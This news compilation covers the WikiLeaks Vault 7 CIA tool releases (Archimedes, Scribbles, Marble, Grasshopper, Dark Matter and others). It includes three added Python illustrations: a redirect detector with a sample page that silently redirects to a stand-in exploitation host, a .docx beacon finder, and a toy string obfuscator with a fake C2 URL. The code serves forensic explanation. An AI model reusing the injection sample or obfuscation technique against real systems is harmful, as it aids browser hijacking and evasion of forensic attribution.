In its seventh CIA leak since March 23rd, WikiLeaks has just revealed
the user manual of a CIA hacking tool known as 'Archimedes', which is purportedly used to attack computers inside a Local Area Network (LAN).
The CIA tool works by redirecting a target's web request to a CIA
server, which serves up a page that looks exactly like the one the
target expected but carries malware. Nothing in the browser itself gives
the substitution away; the attack can only be detected by examining the
page source.
Today, May 5th 2017, WikiLeaks publishes "Archimedes", a tool used
by the CIA to attack a computer inside a Local Area Network (LAN),
usually used in offices. It allows the re-directing of traffic from the
target computer inside the LAN through a computer infected with this
malware and controlled by the CIA. This technique is used by the CIA to redirect the target computer's web browser to an exploitation server
while appearing as a normal browsing session.
The document illustrates a type of attack within a "protected
environment", as the tool is deployed into an existing local network,
abusing existing machines to bring targeted computers under control and allowing further exploitation and abuse.
RELEASE: CIA '#Archimedes' system for exfiltration and browser
hijacking. Includes manuals and binary signatures. https://t.co/XWr33GMGDN
— WikiLeaks (@wikileaks) May 5, 2017
RT provided more details:
The Archimedes tool enables traffic from one computer inside the LAN
to be redirected through a computer infected with this malware and
controlled by the CIA, according to WikiLeaks.
The technique is used to redirect the target's computer web browser
to an exploitation server while appearing as a normal browsing session,
the whistleblowing site said. In this way, the hackers gain an entry
point that allows them access to other machines on that network.
The tool's user guide, which is dated December 2012, explains that
it's used to re-direct traffic in a Local Area Network (LAN) from a
"target's computer through an attacker controlled computer before it is
passed to the gateway."
This allows it to insert a false web-server response that redirects
the target's web browser to a server that will exploit their system all
the while appearing as if it's a normal browsing session.
Archimedes is an update to a tool called 'Fulcrum' and it offers several improvements on the previous system, including providing a method of "gracefully shutting down the tool on demand."
How is US government malware developed? WikiLeaks' release today of
the CIA's 'Fulcrum' malware shows how https://t.co/wrke6MC5ex
— WikiLeaks (@wikileaks) May 5, 2017
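The descriptions above agree on the mechanism: LAN traffic from the target is routed through an attacker-controlled machine, which splices a redirect into an otherwise legitimate web response, so the only evidence in the browser is in the page source. The following is an added illustration of what "examining the page source" amounts to in practice; it is not code from the CIA tool or from the WikiLeaks release. It scans an HTTP response body for the three common client-side redirect constructs (meta refresh, iframe/frame, JavaScript location assignment) and reports those whose target host differs from the host the page was fetched from. The sample pages and the host names `intranet.example.com` and `updates.example.net` are constructed for the example.

```python
"""Flag client-side redirects in an HTTP response body that point off the
origin the page was fetched from. Added illustration, not CIA or WikiLeaks
code; the sample pages and host names below are constructed."""
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

# JavaScript assignments such as  window.location = "http://..."  or
# location.href = '...'  (assignments only; == comparisons do not match).
JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")
# The url= part of a <meta http-equiv="refresh" content="0; url=..."> tag.
META_URL = re.compile(r"""url\s*=\s*['"]?([^'";\s]+)""", re.I)


class RedirectFinder(HTMLParser):
    """Collect (kind, url) for every redirect-capable construct in a page."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_URL.search(a.get("content") or "")
            if m:
                self.targets.append(("meta-refresh", m.group(1)))
        elif tag in ("iframe", "frame") and a.get("src"):
            self.targets.append((tag, a["src"]))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for m in JS_REDIRECT.finditer(data):
                self.targets.append(("script-location", m.group(1)))


def off_origin_redirects(expected_host, body):
    """Return the redirects whose target host differs from expected_host.
    Relative URLs (no host) stay on the origin and are not reported."""
    finder = RedirectFinder()
    finder.feed(body)
    finder.close()
    suspicious = []
    for kind, url in finder.targets:
        host = urlparse(url).hostname
        if host and host.lower() != expected_host.lower():
            suspicious.append((kind, url))
    return suspicious


# Constructed sample bodies: the page the user asked for, and the same page
# with a redirect to an exploitation host spliced in by a LAN man-in-the-middle.
CLEAN_PAGE = """<html><head><title>Intranet</title></head>
<body><iframe src="/help/frame.html"></iframe><a href="/docs">Docs</a></body></html>"""

INJECTED_PAGE = """<html><head><title>Intranet</title>
<meta http-equiv="refresh" content="0; url=http://updates.example.net/a.html">
</head><body>
<iframe src="http://updates.example.net/f.html" width="1" height="1"></iframe>
<script>if (!document.cookie) { window.location = "http://updates.example.net/x"; }</script>
<a href="/docs">Docs</a></body></html>"""

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, off_origin_redirects("intranet.example.com", body))
```

The same-origin iframe in the clean page is deliberately left unreported: a MITM that rewrites responses has no need to point the browser at the legitimate server, so the signal worth alerting on is a redirect to a host the page's own origin never referenced.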
Today, April 28th 2017, WikiLeaks publishes the documentation and source
code for CIA's "Scribbles" project, a document-watermarking
preprocessing system to embed "Web beacon"-style tags into documents
that are likely to be copied by Insiders, Whistleblowers, Journalists or others. The released version (v1.0 RC1) is dated March 1st 2016 and
classified SECRET//ORCON/NOFORN until 2066.
Scribbles is intended for off-line preprocessing of Microsoft Office
documents. For reasons of operational security the user guide demands
that "[t]he Scribbles executable, parameter files, receipts and log
files should not be installed on a target machine, nor left in a
location where it might be collected by an adversary."
According to the documentation, "the Scribbles document watermarking
tool has been successfully tested on [...] Microsoft Office 2013 (on
Windows 8.1 x64), documents from Office versions 97-2016 (Office 95
documents will not work!) [and d]ocuments that are not be locked forms, encrypted, or password-protected". But this limitation to Microsoft
Office documents seems to create problems: "If the targeted end-user
opens them up in a different application, such as OpenOffice or
LibreOffice, the watermark images and URLs may be visible to the
end-user. For this reason, always make sure that the host names and URL components are logically consistent with the original content. If you
are concerned that the targeted end-user may open these documents in a non-Microsoft Office application, please take some test documents and
evaluate them in the likely application before deploying them."
Security researchers and forensic experts will find more detailed
information on how watermarks are applied to documents in the source
code, which is included in this publication as a zipped archive.
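A "Web beacon"-style watermark in an Office document has to reference a remote URL, and the user guide's warning that the "watermark images and URLs may be visible" in LibreOffice points at where that reference lives: in OOXML, a linked (rather than embedded) picture is a relationship entry with TargetMode="External" in the document's .rels part. The following is an added illustration of a forensic check built on that fact; it is not the Scribbles code. It builds two minimal .docx files in memory (constructed; only the parts the scan needs are written), then lists every externally linked image and the hosts the document would contact when rendered. The host `cdn.example.net` is an assumption for the example.

```python
"""Find externally linked images in a .docx: a web-beacon watermark of the
kind the Scribbles user guide describes has to reference a remote URL, and in
OOXML that reference lives in a relationships part with TargetMode="External".
Added illustration, not the Scribbles code; the documents and hosts below are
constructed, and only the parts the scan needs are written."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"


def external_image_links(docx_bytes):
    """Return (rels_part, target_url) for every image pulled from a remote URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == IMAGE_REL:
                    hits.append((name, rel.get("Target")))
    return hits


def beacon_hosts(docx_bytes):
    """Hosts the document will contact when rendered: compare these against the
    organisation the document claims to come from."""
    return sorted({urlparse(t).hostname for _, t in external_image_links(docx_bytes)})


def build_docx(relationships_xml):
    """Write a minimal .docx (constructed) with the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", relationships_xml)
    return buf.getvalue()


RELS_HEAD = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
STYLES_REL = ('<Relationship Id="rId1" Target="styles.xml" '
              'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>')
# An ordinary embedded picture: stored inside the package, no network access.
EMBEDDED_IMG = f'<Relationship Id="rId2" Type="{IMAGE_REL}" Target="media/image1.png"/>'
# A linked picture fetched from a remote server each time the document opens.
BEACON_IMG = (f'<Relationship Id="rId3" Type="{IMAGE_REL}" '
              'Target="http://cdn.example.net/brand/logo-1px.png" TargetMode="External"/>')

CLEAN_DOCX = build_docx(RELS_HEAD + STYLES_REL + EMBEDDED_IMG + "</Relationships>")
WATERMARKED_DOCX = build_docx(RELS_HEAD + STYLES_REL + EMBEDDED_IMG + BEACON_IMG + "</Relationships>")

if __name__ == "__main__":
    print("clean:", beacon_hosts(CLEAN_DOCX))
    print("watermarked:", beacon_hosts(WATERMARKED_DOCX))
```

The guide's advice that "host names and URL components are logically consistent with the original content" is the mirror image of this check: an analyst compares the beacon host against the document's apparent author, and a host that does not fit is the finding.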
Today, April 21st 2017, WikiLeaks publishes the User Guide for CIA's
"Weeping Angel" tool - an implant designed for Samsung F Series Smart Televisions. Based on the "Extending" tool from the MI5/BTSS, the
implant is designed to record audio from the built-in microphone and
egress or store the data.
The classification marks of the User Guide document hint that it was
originally written by the British MI5/BTSS and later shared with the
CIA. Both agencies collaborated on the further development of the
malware and coordinated their work in Joint Development Workshops.
Extending - User Guide
14 April, 2017
Today, April 14th 2017, WikiLeaks publishes six documents from the CIA's
HIVE project created by its "Embedded Development Branch" (EDB).
HIVE is a back-end infrastructure malware with a public-facing HTTPS
interface which is used by CIA implants to transfer exfiltrated
information from target machines to the CIA and to receive commands from
its operators to execute specific tasks on the targets. HIVE is used
across multiple malware implants and CIA operations. The public HTTPS
interface utilizes unsuspicious-looking cover domains to hide its
Anti-Virus companies and forensic experts have noticed that some
possible state-actor malware used this kind of back-end infrastructure
by analyzing the communication behaviour of these specific implants, but
were unable to attribute the back-end (and therefore the implant itself)
to operations run by the CIA. In a recent blog post, Symantec, which
was able to attribute the "Longhorn" activities to the CIA based on
Vault 7, describes such back-end infrastructure:
For C&C servers, Longhorn typically configures a specific domain and IP address combination per target. The domains appear to be registered by
the attackers; however they use privacy services to hide their real
identity. The IP addresses are typically owned by legitimate companies
offering virtual private server (VPS) or webhosting services. The
malware communicates with C&C servers over HTTPS using a custom
underlying cryptographic protocol to protect communications from identification.
The documents from this publication might further enable anti-malware researchers and forensic experts to analyse this kind of communication
between malware implants and back-end servers used in previous illegal activities.
Today, April 7th 2017, WikiLeaks releases Vault 7 "Grasshopper" -- 27
documents from the CIA's Grasshopper framework, a platform used to build customized malware payloads for Microsoft Windows operating systems.
Grasshopper is provided with a variety of modules that can be used by a
CIA operator as blocks to construct a customized implant that will
behave differently, for example maintaining persistence on the computer differently, depending on what particular features or capabilities are
selected in the process of building the bundle. Additionally,
Grasshopper provides a very flexible language to define rules that are
used to "perform a pre-installation survey of the target device,
assuring that the payload will only [be] installed if the target has the
right configuration". Through this grammar CIA operators are able to
build from very simple to very complex logic used to determine, for
example, if the target device is running a specific version of Microsoft Windows, or if a particular Antivirus product is running or not.
Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption).
The requirement list of the Automated Implant Branch (AIB) for
Grasshopper puts special attention on PSP avoidance, so that any
Personal Security Products like 'MS Security Essentials', 'Rising',
'Symantec Endpoint' or 'Kaspersky IS' on target machines do not detect Grasshopper elements.
One of the persistence mechanisms used by the CIA here is 'Stolen Goods'
- whose "components were taken from malware known as Carberp, a
suspected Russian organized crime rootkit." confirming the recycling of
malware found on the Internet by the CIA. "The source of Carberp was
published online, and has allowed AED/RDB to easily steal components as
needed from the malware.". While the CIA claims that "[most] of Carberp
was not used in Stolen Goods" they do acknowledge that "[the]
persistence method, and parts of the installer, were taken and modified
to fit our needs", providing a further example of reuse of portions of
publicly available malware by the CIA, as observed in their analysis of
leaked material from the italian company "HackingTeam".
The documents WikiLeaks publishes today provide insight into the
process of building modern espionage tools and into how the CIA maintains persistence over infected Microsoft Windows computers,
providing directions for those seeking to defend their systems to
identify any existing compromise.
Today, March 31st 2017, WikiLeaks releases Vault 7 "Marble" -- 676
source code files for the CIA's secret anti-forensic Marble Framework.
Marble is used to hamper forensic investigators and anti-virus companies
from attributing viruses, trojans and hacking attacks to the CIA.
Marble does this by hiding ("obfuscating") text fragments used in CIA
malware from visual inspection. This is the digital equivalent of a
specialized CIA tool to place covers over the English language text on
U.S. produced weapons systems before giving them to insurgents secretly
backed by the CIA.
Marble forms part of the CIA's anti-forensics approach and the CIA's
Core Library of malware code. It is "[D]esigned to allow for flexible
and easy-to-use obfuscation" as "string obfuscation algorithms
(especially those that are unique) are often used to link malware to a
specific developer or development shop."
The Marble source code also includes a deobfuscator to reverse CIA text obfuscation. Combined with the revealed obfuscation techniques, a
pattern or signature emerges which can assist forensic investigators
attribute previous hacking attacks and viruses to the CIA. Marble was in
use at the CIA during 2016. It reached 1.0 in 2015.
The source code shows that Marble has test examples not just in English
but also in Chinese, Russian, Korean, Arabic and Farsi. This would
permit a forensic attribution double game, for example by pretending
that the spoken language of the malware creator was not American
English, but Chinese, but then showing attempts to conceal the use of
Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake
The Marble Framework is used for obfuscation only and does not contain
any vulnerabilities or exploits by itself.
Marble Framework (Source Code)
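The Marble description makes two points that a small experiment shows concretely: obfuscated text fragments do not turn up when an analyst runs `strings` over a binary, and a deobfuscator that reverses the scheme recovers them, which is why the released deobfuscator matters to investigators. The following is an added illustration, not Marble's own algorithm: the obfuscation scheme (a key byte, a length byte, then UTF-8 bytes XORed with a per-byte advancing key), the string-table layout, the keys and the sample strings (one in Russian, since the text notes Marble's non-English test examples) are all constructed here.

```python
"""Toy string obfuscation in the spirit of what the Marble description says
(hide text fragments from visual inspection; a deobfuscator reverses it).
Added illustration; the scheme, the string table layout and the sample
strings are constructed here and are not Marble's own algorithm."""
import re


def obfuscate(text, key):
    """Entry layout (constructed): key byte, length byte, then the UTF-8 bytes
    each XORed with a key that advances one step per byte."""
    data = text.encode("utf-8")
    assert len(data) < 256, "single length byte"
    body = bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(data))
    return bytes([key, len(body)]) + body


def deobfuscate_entry(blob, off):
    """Reverse one entry at offset off; return (text, offset of next entry)."""
    key, n = blob[off], blob[off + 1]
    body = blob[off + 2:off + 2 + n]
    text = bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(body)).decode("utf-8")
    return text, off + 2 + n


def deobfuscate_table(blob, off, count):
    """Walk a string table of `count` entries starting at `off`."""
    out = []
    for _ in range(count):
        text, off = deobfuscate_entry(blob, off)
        out.append(text)
    return out


def printable_strings(blob, min_len=6):
    """What `strings` would show an analyst: runs of printable ASCII."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Constructed sample: a fake binary with a header, padding and a string table.
SAMPLE_STRINGS = ["http://updates.example.net/ping", "SOFTWARE\\Example\\Agent",
                  "Служба обновлений"]
SAMPLE_KEYS = [0x5A, 0xC3, 0x17]
TABLE_OFFSET = 2 + 16  # "MZ" marker plus 16 bytes of padding
BLOB = (b"MZ" + b"\x00" * 16
        + b"".join(obfuscate(s, k) for s, k in zip(SAMPLE_STRINGS, SAMPLE_KEYS))
        + b"\x00" * 8)

if __name__ == "__main__":
    print("strings sees:", printable_strings(BLOB))
    print("deobfuscated:", deobfuscate_table(BLOB, TABLE_OFFSET, len(SAMPLE_STRINGS)))
```

The attribution angle in the text follows from the same property: the decoding routine has to ship inside the malware, so its shape (here, the XOR-with-advancing-key loop and the key/length prefix) is a fingerprint that recurs across every sample built with the same framework.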
23 March, 2017
Today, March 23rd 2017, WikiLeaks releases Vault 7 "Dark Matter", which contains documentation for several CIA projects that infect Apple Mac
firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA's Embedded Development Branch (EDB).
These documents explain the techniques used by CIA to gain 'persistence'
on Apple Mac devices, including Macs and iPhones and demonstrate their
use of EFI/UEFI and firmware malware.
Among others, these documents reveal the "Sonic Screwdriver" project
which, as explained by the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting" allowing an attacker to boot its attack software for example from a USB stick "even
when a firmware password is enabled". The CIA's "Sonic Screwdriver"
infector is stored on the modified firmware of an Apple
"DarkSeaSkies" is "an implant that persists in the EFI firmware of an
Apple MacBook Air computer" and consists of "DarkMatter", "SeaPea" and "NightSkies", respectively EFI, kernel-space and user-space implants.
Documents on the "Triton" MacOSX malware, its infector "Dark Mallet" and
its EFI-persistent version "DerStarke" are also included in this
release. While the DerStarke1.4 manual released today dates to 2013,
other Vault 7 documents show that as of 2016 the CIA continues to rely
on and update these systems and is working on the production of
Also included in this release is the manual for the CIA's "NightSkies
1.2", a "beacon/loader/implant tool" for the Apple iPhone. Noteworthy is
that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones, i.e. the CIA has been
infecting the iPhone supply chain of its targets since at least 2008.
While CIA assets are sometimes used to physically infect systems in the
custody of a target it is likely that many CIA physical access attacks
have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise.
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)